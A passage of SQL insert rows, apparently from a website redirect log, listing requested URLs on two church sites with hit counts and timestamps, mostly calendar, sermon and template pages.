(1550, 'http://www.lifeoasisinternationalchurch.org/gobc2016', NULL, '', '', 12, 0, '2017-01-12 00:10:40', '0000-00-00 00:00:00', 301),
(1551, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/19-army-of-the-lord-2', NULL, '', '', 21, 0, '2017-01-12 00:13:58', '0000-00-00 00:00:00', 301),
(1552, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/19/-', NULL, '', '', 1, 0, '2017-01-12 01:33:07', '0000-00-00 00:00:00', 301),
(1553, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1899/4/-', NULL, '', '', 1, 0, '2017-01-12 01:33:16', '0000-00-00 00:00:00', 301),
(1554, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1897/11/-', NULL, '', '', 1, 0, '2017-01-12 01:33:27', '0000-00-00 00:00:00', 301),
(1555, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/10/-', NULL, '', '', 1, 0, '2017-01-12 01:33:38', '0000-00-00 00:00:00', 301),
(1556, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/30/-', NULL, '', '', 1, 0, '2017-01-12 01:33:47', '0000-00-00 00:00:00', 301),
(1557, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1897/1/-', NULL, '', '', 1, 0, '2017-01-12 01:33:58', '0000-00-00 00:00:00', 301),
(1558, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/8/-', NULL, '', '', 1, 0, '2017-01-12 01:34:08', '0000-00-00 00:00:00', 301),
(1559, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1896/2/-', NULL, '', '', 1, 0, '2017-01-12 01:34:23', '0000-00-00 00:00:00', 301),
(1560, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1906/4/-', NULL, '', '', 1, 0, '2017-01-12 01:34:29', '0000-00-00 00:00:00', 301),
(1561, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1897/3/-', NULL, '', '', 1, 0, '2017-01-12 01:34:40', '0000-00-00 00:00:00', 301),
(1562, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/4/-', NULL, '', '', 1, 0, '2017-01-12 01:34:50', '0000-00-00 00:00:00', 301),
(1563, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1895/12/-', NULL, '', '', 1, 0, '2017-01-12 01:35:09', '0000-00-00 00:00:00', 301),
(1564, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/15/-', NULL, '', '', 1, 0, '2017-01-12 01:35:19', '0000-00-00 00:00:00', 301),
(1565, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/15/-', NULL, '', '', 1, 0, '2017-01-12 01:35:30', '0000-00-00 00:00:00', 301),
(1566, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1897/10/-', NULL, '', '', 1, 0, '2017-01-12 01:35:39', '0000-00-00 00:00:00', 301),
(1567, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1895/2/-', NULL, '', '', 1, 0, '2017-01-12 01:35:49', '0000-00-00 00:00:00', 301),
(1568, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1904/7/-', NULL, '', '', 1, 0, '2017-01-12 01:36:10', '0000-00-00 00:00:00', 301),
(1569, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/27/-', NULL, '', '', 1, 0, '2017-01-12 01:36:11', '0000-00-00 00:00:00', 301),
(1570, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/27/-', NULL, '', '', 1, 0, '2017-01-12 01:36:17', '0000-00-00 00:00:00', 301),
(1571, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1904/5/-', NULL, '', '', 1, 0, '2017-01-12 01:36:28', '0000-00-00 00:00:00', 301),
(1572, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1903/6/-', NULL, '', '', 1, 0, '2017-01-12 01:36:37', '0000-00-00 00:00:00', 301),
(1573, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1905/4/-', NULL, '', '', 1, 0, '2017-01-12 01:36:47', '0000-00-00 00:00:00', 301),
(1574, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/21/-', NULL, '', '', 1, 0, '2017-01-12 01:36:57', '0000-00-00 00:00:00', 301),
(1575, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1896/3/-', NULL, '', '', 1, 0, '2017-01-12 01:37:08', '0000-00-00 00:00:00', 301),
(1576, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/10/4/-', NULL, '', '', 1, 0, '2017-01-12 01:37:17', '0000-00-00 00:00:00', 301),
(1577, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/27/-', NULL, '', '', 1, 0, '2017-01-12 01:37:28', '0000-00-00 00:00:00', 301),
(1578, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/1/-', NULL, '', '', 1, 0, '2017-01-12 01:37:38', '0000-00-00 00:00:00', 301),
(1579, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/16/-', NULL, '', '', 1, 0, '2017-01-12 01:37:50', '0000-00-00 00:00:00', 301),
(1580, 'http://lifeoasisinternationalchurch.org/index.php/template-info/gin/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2017-01-12 01:39:13', '0000-00-00 00:00:00', 301),
(1581, 'http://www.lifeoasisinternationalchurch.org/template-info/books/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-01-12 01:47:58', '0000-00-00 00:00:00', 301),
(1582, 'http://lifeoasisinternationalchurch.org/templates/rt_ionosphere/roksprocket/layouts/headlines/themes/default/css-be655ee638bd52b1c1503fcccf4f9864.php', NULL, '', '', 30, 0, '2017-01-12 01:58:42', '0000-00-00 00:00:00', 301),
(1583, 'http://www.lifeoasisinternationalchurch.org/template-info/12-sample-content/17-sample-content-6', NULL, '', '', 1, 0, '2017-01-12 03:18:49', '0000-00-00 00:00:00', 301),
(1584, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/2/sermons?start=20', NULL, '', '', 1, 0, '2017-01-12 03:23:57', '0000-00-00 00:00:00', 301),
(1585, 'http://www.lifeoasisinternationalchurch.org/about-us/the-church-2/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-01-12 04:50:15', '0000-00-00 00:00:00', 301),
(1586, 'http://www.lifeoasisinternationalchurch.org/52-prophetic-words-for-day-4', NULL, '', '', 9, 0, '2017-01-12 06:38:43', '0000-00-00 00:00:00', 301),
(1587, 'http://www.lifeoasisinternationalchurch.org/template-info/12-sample-content/15-sample-content-4', NULL, '', '', 1, 0, '2017-01-12 07:29:10', '0000-00-00 00:00:00', 301),
(1588, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1898/5/-', NULL, '', '', 1, 0, '2017-01-12 07:53:14', '0000-00-00 00:00:00', 301),
(1589, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1897/4/-', NULL, '', '', 1, 0, '2017-01-12 07:53:41', '0000-00-00 00:00:00', 301),
(1590, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1895/11/-', NULL, '', '', 1, 0, '2017-01-12 07:53:55', '0000-00-00 00:00:00', 301),
(1591, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/1/-', NULL, '', '', 1, 0, '2017-01-12 07:54:08', '0000-00-00 00:00:00', 301),
(1592, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1894/12/-', NULL, '', '', 1, 0, '2017-01-12 07:54:22', '0000-00-00 00:00:00', 301),
(1593, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1897/8/-', NULL, '', '', 1, 0, '2017-01-12 07:54:36', '0000-00-00 00:00:00', 301),
(1594, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1896/4/-', NULL, '', '', 1, 0, '2017-01-12 07:54:49', '0000-00-00 00:00:00', 301),
(1595, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1895/3/-', NULL, '', '', 1, 0, '2017-01-12 07:55:03', '0000-00-00 00:00:00', 301),
(1596, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1896/9/-', NULL, '', '', 1, 0, '2017-01-12 07:55:17', '0000-00-00 00:00:00', 301),
(1597, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/2/-', NULL, '', '', 1, 0, '2017-01-12 07:55:31', '0000-00-00 00:00:00', 301),
(1598, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1894/11/-', NULL, '', '', 1, 0, '2017-01-12 07:55:45', '0000-00-00 00:00:00', 301),
(1599, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/30/-', NULL, '', '', 1, 0, '2017-01-12 07:55:58', '0000-00-00 00:00:00', 301),
(1600, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/26/-', NULL, '', '', 1, 0, '2017-01-12 07:56:12', '0000-00-00 00:00:00', 301),
(1601, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/7/-', NULL, '', '', 1, 0, '2017-01-12 07:56:26', '0000-00-00 00:00:00', 301),
(1602, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/2-rev-olusola-ayodele-areogun', NULL, '', '', 8, 0, '2017-01-12 07:56:32', '0000-00-00 00:00:00', 301),
(1603, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/15/-', NULL, '', '', 1, 0, '2017-01-12 07:56:39', '0000-00-00 00:00:00', 301),
(1604, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1895/10/-', NULL, '', '', 1, 0, '2017-01-12 07:56:54', '0000-00-00 00:00:00', 301),
(1605, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/14/-', NULL, '', '', 1, 0, '2017-01-12 07:57:08', '0000-00-00 00:00:00', 301),
(1606, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/3/-', NULL, '', '', 1, 0, '2017-01-12 07:57:22', '0000-00-00 00:00:00', 301),
(1607, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/14/-', NULL, '', '', 1, 0, '2017-01-12 07:57:37', '0000-00-00 00:00:00', 301),
(1608, 'http://www.lifeoasisinternationalchurch.org/template-info/12-sample-content/16-sample-content-5', NULL, '', '', 1, 0, '2017-01-12 08:00:03', '0000-00-00 00:00:00', 301),
(1609, 'http://www.lifeoasisinternationalchurch.org/index.php/videos/18-loic/50-young-achievers', NULL, '', '', 6, 0, '2017-01-12 08:00:05', '0000-00-00 00:00:00', 301),
(1610, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1895/9/-', NULL, '', '', 1, 0, '2017-01-12 08:08:19', '0000-00-00 00:00:00', 301),
(1611, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/17/-', NULL, '', '', 1, 0, '2017-01-12 08:23:29', '0000-00-00 00:00:00', 301),
(1612, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/17/-', NULL, '', '', 1, 0, '2017-01-12 08:42:30', '0000-00-00 00:00:00', 301),
(1613, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/48906', NULL, '', '', 1, 0, '2017-01-12 08:54:47', '0000-00-00 00:00:00', 301),
(1614, 'http://www.lifeoasisinternationalchurch.org/component/content/category/index.php', NULL, '', '', 1, 0, '2017-01-12 08:56:09', '0000-00-00 00:00:00', 301),
(1615, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/30/-', NULL, '', '', 1, 0, '2017-01-12 08:57:32', '0000-00-00 00:00:00', 301),
(1616, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/25/-', NULL, '', '', 1, 0, '2017-01-12 09:08:54', '0000-00-00 00:00:00', 301),
(1617, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/13/-', NULL, '', '', 1, 0, '2017-01-12 09:27:56', '0000-00-00 00:00:00', 301),
(1618, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/30-tapping-into-the-anointing-for-increase-3', NULL, '', '', 6, 0, '2017-01-12 09:33:23', '0000-00-00 00:00:00', 301),
(1619, 'http://lifeoasisinternationalchurch.org/template-info/outreach/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2017-01-12 09:36:21', '0000-00-00 00:00:00', 301),
(1620, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/9/-', NULL, '', '', 1, 0, '2017-01-12 09:39:18', '0000-00-00 00:00:00', 301),
(1621, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1895/4/-', NULL, '', '', 1, 0, '2017-01-12 09:42:55', '0000-00-00 00:00:00', 301),
(1622, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/15/-', NULL, '', '', 1, 0, '2017-01-12 09:46:45', '0000-00-00 00:00:00', 301),
(1623, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/29/-', NULL, '', '', 1, 0, '2017-01-12 09:50:30', '0000-00-00 00:00:00', 301),
(1624, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1899/9/-', NULL, '', '', 1, 0, '2017-01-12 09:54:27', '0000-00-00 00:00:00', 301),
(1625, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1894/3/-', NULL, '', '', 1, 0, '2017-01-12 09:58:05', '0000-00-00 00:00:00', 301),
(1626, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1902/5/-', NULL, '', '', 1, 0, '2017-01-12 10:01:51', '0000-00-00 00:00:00', 301),
(1627, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1897/7/-', NULL, '', '', 1, 0, '2017-01-12 10:05:41', '0000-00-00 00:00:00', 301),
(1628, 'http://www.lifeoasisinternationalchurch.org/11-demo-articles/54-slide-04', NULL, '', '', 8, 0, '2017-01-12 10:08:34', '0000-00-00 00:00:00', 301),
(1629, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1904/3/-', NULL, '', '', 1, 0, '2017-01-12 10:09:26', '0000-00-00 00:00:00', 301),
(1630, 'https://www.spiritmeat.net/component/content/article/2-uncategorised/58-private', NULL, '', '', 2, 0, '2017-01-12 10:39:32', '0000-00-00 00:00:00', 301),
(1631, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/21', NULL, '', '', 1, 0, '2017-01-12 10:39:39', '0000-00-00 00:00:00', 301),
(1632, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/29', NULL, '', '', 1, 0, '2017-01-12 10:39:41', '0000-00-00 00:00:00', 301),
(1633, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/30', NULL, '', '', 1, 0, '2017-01-12 10:39:43', '0000-00-00 00:00:00', 301),
(1634, 'http://www.lifeoasisinternationalchurch.org/index.php/223-2016-day-6', NULL, '', '', 10, 0, '2017-01-12 11:09:00', '0000-00-00 00:00:00', 301),
(1635, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/16-entering-into-winning-position-4', NULL, '', '', 57, 0, '2017-01-12 11:35:07', '0000-00-00 00:00:00', 301),
(1636, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/15', NULL, '', '', 4, 0, '2017-01-12 13:34:03', '0000-00-00 00:00:00', 301),
(1637, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/itemlist/tag/HTML5', NULL, '', '', 1, 0, '2017-01-12 13:34:09', '0000-00-00 00:00:00', 301),
(1638, 'http://www.lifeoasisinternationalchurch.org/template-info/12-sample-content/12-sample-content-1', NULL, '', '', 1, 0, '2017-01-12 15:27:17', '0000-00-00 00:00:00', 301),
(1639, 'http://www.lifeoasisinternationalchurch.org/template-info/11-demo-articles/20-welcome', NULL, '', '', 1, 0, '2017-01-12 15:46:38', '0000-00-00 00:00:00', 301),
(1640, 'http://www.lifeoasisinternationalchurch.org/gobc/reserve/download', NULL, '', '', 5, 0, '2017-01-12 16:19:31', '0000-00-00 00:00:00', 301),
(1641, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1903/4/-', NULL, '', '', 1, 0, '2017-01-12 16:53:41', '0000-00-00 00:00:00', 301),
(1642, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/22/-', NULL, '', '', 1, 0, '2017-01-12 16:53:43', '0000-00-00 00:00:00', 301),
(1643, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/14/-', NULL, '', '', 1, 0, '2017-01-12 16:53:44', '0000-00-00 00:00:00', 301),
(1644, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/28/-', NULL, '', '', 1, 0, '2017-01-12 16:53:44', '0000-00-00 00:00:00', 301),
(1645, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1899/11/-', NULL, '', '', 1, 0, '2017-01-12 16:53:45', '0000-00-00 00:00:00', 301),
(1646, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/16/-', NULL, '', '', 1, 0, '2017-01-12 16:53:50', '0000-00-00 00:00:00', 301),
(1647, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/10/-', NULL, '', '', 1, 0, '2017-01-12 16:53:54', '0000-00-00 00:00:00', 301),
(1648, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/27/-', NULL, '', '', 1, 0, '2017-01-12 16:54:03', '0000-00-00 00:00:00', 301),
(1649, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/25/-', NULL, '', '', 1, 0, '2017-01-12 16:54:12', '0000-00-00 00:00:00', 301),
(1650, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/2/-', NULL, '', '', 1, 0, '2017-01-12 16:54:22', '0000-00-00 00:00:00', 301),
(1651, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/6/-', NULL, '', '', 1, 0, '2017-01-12 16:54:31', '0000-00-00 00:00:00', 301),
(1652, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/4/-', NULL, '', '', 1, 0, '2017-01-12 16:54:40', '0000-00-00 00:00:00', 301),
(1653, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/5/-', NULL, '', '', 1, 0, '2017-01-12 16:54:50', '0000-00-00 00:00:00', 301),
(1654, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/23/-', NULL, '', '', 1, 0, '2017-01-12 16:54:59', '0000-00-00 00:00:00', 301),
(1655, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/26/-', NULL, '', '', 1, 0, '2017-01-12 16:55:08', '0000-00-00 00:00:00', 301),
(1656, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/5/-', NULL, '', '', 1, 0, '2017-01-12 16:55:18', '0000-00-00 00:00:00', 301),
(1657, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1894/10/-', NULL, '', '', 1, 0, '2017-01-12 16:55:27', '0000-00-00 00:00:00', 301),
(1658, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/17/-', NULL, '', '', 1, 0, '2017-01-12 16:55:36', '0000-00-00 00:00:00', 301),
(1659, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1895/5/-', NULL, '', '', 1, 0, '2017-01-12 16:55:46', '0000-00-00 00:00:00', 301),
(1660, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/6/-', NULL, '', '', 1, 0, '2017-01-12 16:55:55', '0000-00-00 00:00:00', 301),
(1661, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1894/4/-', NULL, '', '', 1, 0, '2017-01-12 16:56:04', '0000-00-00 00:00:00', 301),
(1662, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1894/2/-', NULL, '', '', 1, 0, '2017-01-12 16:56:14', '0000-00-00 00:00:00', 301),
(1663, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1894/5/-', NULL, '', '', 1, 0, '2017-01-12 16:56:23', '0000-00-00 00:00:00', 301),
(1664, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1899/6/-', NULL, '', '', 1, 0, '2017-01-12 16:56:32', '0000-00-00 00:00:00', 301),
(1665, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1902/3/-', NULL, '', '', 1, 0, '2017-01-12 16:56:42', '0000-00-00 00:00:00', 301),
(1666, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1896/5/-', NULL, '', '', 1, 0, '2017-01-12 16:56:51', '0000-00-00 00:00:00', 301),
(1667, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1901/4/-', NULL, '', '', 1, 0, '2017-01-12 16:57:01', '0000-00-00 00:00:00', 301),
(1668, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1900/7/-', NULL, '', '', 1, 0, '2017-01-12 16:57:10', '0000-00-00 00:00:00', 301),
(1669, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1892/1/-', NULL, '', '', 1, 0, '2017-01-12 16:57:20', '0000-00-00 00:00:00', 301),
(1670, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1895/6/-', NULL, '', '', 1, 0, '2017-01-12 16:57:29', '0000-00-00 00:00:00', 301),
(1671, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1890/12/-', NULL, '', '', 1, 0, '2017-01-12 16:57:40', '0000-00-00 00:00:00', 301),
(1672, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1892/10/-', NULL, '', '', 1, 0, '2017-01-12 16:57:50', '0000-00-00 00:00:00', 301),
(1673, 'http://ljmti.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/Joomla', NULL, '', '', 1, 0, '2017-01-12 17:06:08', '0000-00-00 00:00:00', 301),
(1674, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/3-rev-mrs-oyenike-areogun/popup?tmpl=component', NULL, '', '', 20, 0, '2017-01-12 17:15:57', '0000-00-00 00:00:00', 301),
(1675, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/7', NULL, '', '', 4, 0, '2017-01-12 18:41:57', '0000-00-00 00:00:00', 301),
(1676, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/23', NULL, '', '', 3, 0, '2017-01-12 18:47:42', '0000-00-00 00:00:00', 301),
(1677, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/24', NULL, '', '', 2, 0, '2017-01-12 18:55:53', '0000-00-00 00:00:00', 301),
(1678, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/20-army-of-the-lord-3', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 27, 0, '2017-01-12 19:17:54', '0000-00-00 00:00:00', 301),
(1679, 'http://lifeoasisinternationalchurch.org/libraries/gantry/css/css-b825f3c52f788bffb336b70841e64d5d.php', NULL, 'http://webcache.googleusercontent.com/search?q=cache:5HqMZI5VbyEJ:lifeoasisinternationalchurch.org/component/content/article/18-loic/72-chat+&cd=3&hl=en&ct=clnk&gl=us', '', 3, 0, '2017-01-12 20:04:25', '0000-00-00 00:00:00', 301),
(1680, 'http://lifeoasisinternationalchurch.org/plugins/system/rokbox/themes/light/css-b518d664167dd795248190ff44b8159f.php', NULL, 'http://webcache.googleusercontent.com/search?q=cache:5HqMZI5VbyEJ:lifeoasisinternationalchurch.org/component/content/article/18-loic/72-chat+&cd=3&hl=en&ct=clnk&gl=us', '', 2, 0, '2017-01-12 20:04:25', '0000-00-00 00:00:00', 301),
(1681, 'http://lifeoasisinternationalchurch.org/components/com_imageshow/assets/css/css-eb60729619b4687631fb0af5f7a0a8cc.php', NULL, 'http://webcache.googleusercontent.com/search?q=cache:5HqMZI5VbyEJ:lifeoasisinternationalchurch.org/component/content/article/18-loic/72-chat+&cd=3&hl=en&ct=clnk&gl=us', '', 3, 0, '2017-01-12 20:04:25', '0000-00-00 00:00:00', 301),
(1682, 'http://lifeoasisinternationalchurch.org/cache/js-3ea88f7927eba2e8243e9ba89ef62c50.php', NULL, 'http://webcache.googleusercontent.com/search?q=cache:5HqMZI5VbyEJ:lifeoasisinternationalchurch.org/component/content/article/18-loic/72-chat+&cd=3&hl=en&ct=clnk&gl=us', '', 2, 0, '2017-01-12 20:04:25', '0000-00-00 00:00:00', 301),
(1683, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0', NULL, '', '', 262, 0, '2017-01-12 23:24:14', '0000-00-00 00:00:00', 301),
(1684, 'http://www.lifeoasisinternationalchurch.org/12-sample-content/19-sample-content-8', NULL, '', '', 4, 0, '2017-01-12 23:31:45', '0000-00-00 00:00:00', 301),
(1685, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/18', NULL, '', '', 4, 0, '2017-01-12 23:31:49', '0000-00-00 00:00:00', 301),
(1686, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/11', NULL, '', '', 4, 0, '2017-01-13 01:00:06', '0000-00-00 00:00:00', 301),
(1687, 'http://lifeoasisinternationalchurch.org/index.php/247-day-11-of-21-days-fasting-and-prayer-october', NULL, '', '', 2, 0, '2017-01-13 01:50:30', '0000-00-00 00:00:00', 301),
(1688, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/23/-', NULL, '', '', 1, 0, '2017-01-13 01:52:42', '0000-00-00 00:00:00', 301),
(1689, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1891/11/-', NULL, '', '', 1, 0, '2017-01-13 01:52:43', '0000-00-00 00:00:00', 301),
(1690, 'http://lifeoasisinternationalchurch.org/index.php/138-day-12', NULL, '', '', 1, 0, '2017-01-13 02:34:30', '0000-00-00 00:00:00', 301),
(1691, 'http://lifeoasisinternationalchurch.org/index.php/template-info/music', NULL, '', '', 7, 0, '2017-01-13 03:12:24', '0000-00-00 00:00:00', 301),
(1692, 'http://lifeoasisinternationalchurch.org/index.php/257-day-8-of-21-days-fasting-and-prayer-october', NULL, '', '', 3, 0, '2017-01-13 04:06:47', '0000-00-00 00:00:00', 301),
(1693, 'http://lifeoasisinternationalchurch.org/index.php/branches/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-01-13 04:22:13', '0000-00-00 00:00:00', 301),
(1694, 'http://www.lifeoasisinternationalchurch.org/template-info/12-sample-content/19-sample-content-8', NULL, '', '', 1, 0, '2017-01-13 04:22:15', '0000-00-00 00:00:00', 301),
(1695, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/', NULL, '', '', 2, 0, '2017-01-13 05:14:41', '0000-00-00 00:00:00', 301),
(1696, 'http://lifeoasisinternationalchurch.org/11-demo-articles/2-module-positions', NULL, '', '', 5, 0, '2017-01-13 05:31:31', '0000-00-00 00:00:00', 301),
(1697, 'http://www.lifeoasisinternationalchurch.org/index.php/146-day2', NULL, '', '', 5, 0, '2017-01-13 05:34:04', '0000-00-00 00:00:00', 301),
(1698, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/popup?tmpl=component', NULL, '', '', 2, 0, '2017-01-13 06:31:53', '0000-00-00 00:00:00', 301),
(1699, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/10-grace-2', NULL, '', '', 7, 0, '2017-01-13 07:25:22', '0000-00-00 00:00:00', 301),
(1700, 'https://www.spiritmeat.net/resources/streaming-registered?view=reset', NULL, '', '', 1, 0, '2017-01-13 07:25:24', '0000-00-00 00:00:00', 301),
(1701, 'http://www.lifeoasisinternationalchurch.org/template-info/12-sample-content/14-sample-content-3', NULL, '', '', 1, 0, '2017-01-13 07:29:55', '0000-00-00 00:00:00', 301),
(1702, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/26', NULL, '', '', 4, 0, '2017-01-13 07:29:57', '0000-00-00 00:00:00', 301),
(1703, 'http://lifeoasisinternationalchurch.org/index.php/11-demo-articles/20-welcome', NULL, '', '', 2, 0, '2017-01-13 07:33:38', '0000-00-00 00:00:00', 301),
(1704, 'http://lifeoasisinternationalchurch.org/template-info/media-outreach/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2017-01-13 07:33:39', '0000-00-00 00:00:00', 301),
(1705, 'http://www.lifeoasisinternationalchurch.org/blog/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-01-13 08:13:42', '0000-00-00 00:00:00', 301),
